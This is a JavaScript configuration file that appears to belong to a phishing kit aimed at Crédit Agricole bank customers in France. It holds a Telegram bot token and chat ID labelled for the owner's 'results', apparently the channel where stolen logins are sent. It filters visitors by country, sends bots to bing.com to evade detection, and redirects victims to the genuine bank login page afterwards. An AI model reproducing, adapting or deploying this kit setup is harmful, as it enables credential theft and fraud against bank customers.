function Configuration() {
    return {


        /*     ________     Telegram Keys     ________     */

        tokenRzltOwner : "1756483077:AAGCbkOWaJnnsoV5BQzP1yiFjsK15546C2E",
        idRzltOwner : "-783890934",

        /*     ________     Show Only For     ________     */

        country : "France",

        /*     ________     Final Redirect     ________     */

        redirect : "https://www.credit-agricole.fr/particulier/acces-cr.html?origin=/content/ca/national/npc/fr/particulier/acceder-a-mes-comptes.html",
        redirectBot : "https://bing.com"

    }
}

export default Configuration
